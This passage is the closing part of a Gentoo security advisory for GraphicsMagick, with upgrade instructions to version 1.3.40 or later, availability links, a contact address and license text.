Please review the referenced CVE identifiers for details.

Workaround  
==========

There is no known workaround at this time.

Resolution  
==========

All GraphicsMagick users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=media-gfx/graphicsmagick-1.3.40"

References  
==========

Availability  
============

This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

 https://security.gentoo.org/glsa/202407-15

Concerns?  
=========

Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org.

License  
=======

Copyright 2024 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5